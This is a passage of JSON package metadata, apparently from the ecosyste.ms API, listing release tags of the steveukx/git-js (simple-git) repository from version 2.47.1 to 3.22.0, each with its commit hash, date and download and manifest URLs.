ished_at":"2023-12-29T09:43:37.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.22.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.22.0/manifests"},{"name":"simple-git@3.21.0","sha":"4820ac91f83104fc5cf4561063b237990c7d3bca","kind":"tag","published_at":"2023-11-20T07:26:42.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.21.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.21.0/manifests"},{"name":"simple-git@3.20.0","sha":"8a31c45a1359248cb38d768d22a5e29903ceef8a","kind":"tag","published_at":"2023-09-23T13:16:30.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.20.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.20.0/manifests"},{"name":"simple-git@3.19.1","sha":"d184c13273abca4b6572c260f9625c19f944d4f7","kind":"tag","published_at":"2023-06-26T10:16:17.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.19.1","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.19.1/manifests"},{"name":"simple-git@3.19.0","sha":"f101061783aae2a96c0ca3323f8fc979e34f7dd8","kind":"tag","published_at":"2023-05-24T19:26:05.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.19.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.19.0/manifests"},{"name":"simple-git@3.18.0","sha":"a52466d9b5255fdd787a49656ab7ddfa72a122fb","kind":"tag","published_at":"2023-04-25T07:42:50.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.18.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.18.0/manifests"},{"name":"simple-git@3.17.0","sha":"6752835bee01f42daca5ca15b47d0a95b33894f9","kind":"tag","published_at":"2023-03-04T15:00:28.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.17.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.17.0/manifests"},{"name":"simple-git@3.16.1","sha":"c5ac28a1298fd95aee5eb98415676348417001a1","kind":"tag","published_at":"2023-02-15T13:15:23.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.16.1","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.16.1/manifests"},{"name":"simple-git@3.16.0","sha":"d716d32e5097ad3da4af07e660ebe83c69d9fad7","kind":"tag","published_at":"2023-01-16T07:16:01.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.16.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.16.0/manifests"},{"name":"simple-git@3.15.1","sha":"459ec92e5cb317e027c6cd9b89be428900f16456","kind":"tag","published_at":"2022-11-30T15:19:09.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.15.1","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.15.1/manifests"},{"name":"simple-git@3.15.0","sha":"e1d66b6469d123d5629383ddc5d089294cc93ea2","kind":"tag","published_at":"2022-11-12T14:21:40.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.15.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.15.0/manifests"},{"name":"simple-git@3.14.1","sha":"3324eed61f0d10600b78a6be7772ad9b6febae4b","kind":"tag","published_at":"2022-09-17T14:20:02.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.14.1","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.14.1/manifests"},{"name":"simple-git@3.14.0","sha":"0f964bab24ecfe032155de018187a9bae3c2ca0a","kind":"tag","published_at":"2022-09-04T17:00:00.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.14.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.14.0/manifests"},{"name":"simple-git@3.13.0","sha":"1cd0dac89940509577366ec09eb1a74a3d86d38f","kind":"tag","published_at":"2022-08-22T07:46:10.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.13.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.13.0/manifests"},{"name":"simple-git@3.12.0","sha":"a6168aebb4c4c3ee0878474b5f0bb0ba90de8d60","kind":"tag","published_at":"2022-08-08T09:03:57.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.12.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.12.0/manifests"},{"name":"simple-git@3.11.0","sha":"eeac09e3d3fccb591ecae19b86ebe75204ac0d28","kind":"tag","published_at":"2022-07-30T08:21:45.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.11.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.11.0/manifests"},{"name":"simple-git@3.10.0","sha":"2347d48aa6884a6d8c57c7a628f4c32ea35fb7be","kind":"tag","published_at":"2022-06-25T19:49:53.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.10.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.10.0/manifests"},{"name":"simple-git@3.9.0","sha":"24a7a71e1038752c4caa6e4a3019b04792b77959","kind":"tag","published_at":"2022-06-22T06:39:55.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.9.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.9.0/manifests"},{"name":"simple-git@3.8.0","sha":"c6fbb7b6bc99cd4192720ee5ca1dcf3e4ed7a9b1","kind":"tag","published_at":"2022-06-18T14:48:31.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.8.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.8.0/manifests"},{"name":"simple-git@3.7.1","sha":"c022042374b8d3239b9893c55f28d55fd40740db","kind":"tag","published_at":"2022-04-23T16:07:00.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.7.1","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.7.1/manifests"},{"name":"simple-git@3.7.0","sha":"98ea7ca048c0ee4ad3273ce203a33d5b3d058c35","kind":"tag","published_at":"2022-04-19T14:45:10.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.7.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.7.0/manifests"},{"name":"simple-git@3.6.0","sha":"ed749c6578bde73603069a34b298bc98983fd069","kind":"tag","published_at":"2022-04-10T05:16:03.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.6.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.6.0/manifests"},{"name":"simple-git@3.5.0","sha":"66c903cfabedfe24b7c9a6123bb75b8ad69c16e5","kind":"tag","published_at":"2022-03-29T06:40:08.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.5.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.5.0/manifests"},{"name":"simple-git@3.4.0","sha":"9bf9baa54b9389e797992d717afdfc05dceaa524","kind":"tag","published_at":"2022-03-18T17:15:45.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.4.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.4.0/manifests"},{"name":"simple-git@3.3.0","sha":"94c24623bf2f48b66ba1db22b94dbebd42e10f53","kind":"tag","published_at":"2022-03-11T12:22:44.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.3.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.3.0/manifests"},{"name":"simple-git@3.2.6","sha":"e4ff6274c644dbcd7fdde2ba4078855c181dfd3c","kind":"tag","published_at":"2022-02-17T17:13:31.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.2.6","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.2.6/manifests"},{"name":"simple-git@3.2.4","sha":"bcfa6f8000d246e59c8016b1d6473257633b8122","kind":"tag","published_at":"2022-02-13T18:16:55.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git@3.2.4","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git@3.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git%403.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git@3.2.4/manifests"},{"name":"repo-v3.2.0","sha":"60ca821148c0c839218733c4451a7a93f4c584f1","kind":"commit","published_at":"2022-02-01T22:10:02.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/repo-v3.2.0","html_url":"https://github.com/steveukx/git-js/releases/tag/repo-v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@repo-v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.2.0/manifests"},{"name":"simple-git-v3.1.1","sha":"7d198fafaa80f9b0a8cdee4f480f6da459e6687e","kind":"commit","published_at":"2022-01-26T14:25:19.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git-v3.1.1","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git-v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git-v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git-v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git-v3.1.1/manifests"},{"name":"repo-v3.1.1","sha":"7d198fafaa80f9b0a8cdee4f480f6da459e6687e","kind":"commit","published_at":"2022-01-26T14:25:19.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/repo-v3.1.1","html_url":"https://github.com/steveukx/git-js/releases/tag/repo-v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@repo-v3.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.1.1/manifests"},{"name":"simple-git-v3.1.0","sha":"2ef363e459bdd9cfe2bfdb974192e78145ff3765","kind":"commit","published_at":"2022-01-23T12:20:48.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git-v3.1.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git-v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git-v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git-v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git-v3.1.0/manifests"},{"name":"repo-v3.1.0","sha":"2ef363e459bdd9cfe2bfdb974192e78145ff3765","kind":"commit","published_at":"2022-01-23T12:20:48.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/repo-v3.1.0","html_url":"https://github.com/steveukx/git-js/releases/tag/repo-v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@repo-v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.1.0/manifests"},{"name":"simple-git-v3.0.4","sha":"9089fc816775d8fae84725bed1cbead23490ca57","kind":"commit","published_at":"2022-01-23T09:36:16.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git-v3.0.4","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git-v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git-v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git-v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git-v3.0.4/manifests"},{"name":"repo-v3.0.4","sha":"9089fc816775d8fae84725bed1cbead23490ca57","kind":"commit","published_at":"2022-01-23T09:36:16.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/repo-v3.0.4","html_url":"https://github.com/steveukx/git-js/releases/tag/repo-v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@repo-v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.0.4/manifests"},{"name":"simple-git-v3.0.3","sha":"08ac62656d04b6d13174fb1949afcfb04df867d5","kind":"commit","published_at":"2022-01-20T07:26:59.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git-v3.0.3","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git-v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git-v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git-v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git-v3.0.3/manifests"},{"name":"repo-v3.0.3","sha":"08ac62656d04b6d13174fb1949afcfb04df867d5","kind":"commit","published_at":"2022-01-20T07:26:59.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/repo-v3.0.3","html_url":"https://github.com/steveukx/git-js/releases/tag/repo-v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@repo-v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.0.3/manifests"},{"name":"simple-git-v3.0.2","sha":"02f4b0a9ccc1a3d19fbb5dcc04d6d17fbfe17846","kind":"commit","published_at":"2022-01-18T18:20:08.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git-v3.0.2","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git-v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git-v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git-v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git-v3.0.2/manifests"},{"name":"repo-v3.0.2","sha":"02f4b0a9ccc1a3d19fbb5dcc04d6d17fbfe17846","kind":"commit","published_at":"2022-01-18T18:20:08.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/repo-v3.0.2","html_url":"https://github.com/steveukx/git-js/releases/tag/repo-v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@repo-v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.0.2/manifests"},{"name":"simple-git-v3.0.1","sha":"3045120738a5c5d3868d9308b5de2fb3727c8ca2","kind":"commit","published_at":"2022-01-18T17:48:54.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git-v3.0.1","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git-v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git-v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git-v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git-v3.0.1/manifests"},{"name":"repo-v3.0.1","sha":"3045120738a5c5d3868d9308b5de2fb3727c8ca2","kind":"commit","published_at":"2022-01-18T17:48:54.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/repo-v3.0.1","html_url":"https://github.com/steveukx/git-js/releases/tag/repo-v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@repo-v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.0.1/manifests"},{"name":"simple-git-v3.0.0","sha":"c97c08c2630a4318fe65124344180255ee76af51","kind":"commit","published_at":"2022-01-16T09:52:27.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/simple-git-v3.0.0","html_url":"https://github.com/steveukx/git-js/releases/tag/simple-git-v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@simple-git-v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git-v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/simple-git-v3.0.0/manifests"},{"name":"repo-v3.0.0","sha":"c97c08c2630a4318fe65124344180255ee76af51","kind":"commit","published_at":"2022-01-16T09:52:27.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/repo-v3.0.0","html_url":"https://github.com/steveukx/git-js/releases/tag/repo-v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@repo-v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/repo-v3.0.0/manifests"},{"name":"v2.48.0","sha":"a569868d800a0d872e8fb1534bb0dceccff47a4f","kind":"commit","published_at":"2021-12-01T20:12:50.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.48.0","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/steveukx%2Fgit-js/tags/v2.48.0/manifests"},{"name":"v2.47.1","sha":"080c82b3dc12fa5b76540639e552b75f8a88abf0","kind":"commit","published_at":"2021-11-29T16:13:36.000Z","download_url":"https://codeload.github.com/steveukx/git-js/tar.gz/v2.47.1","html_url":"https://github.com/steveukx/git-js/releases/tag/v2.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/steveukx/git-js@v2.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/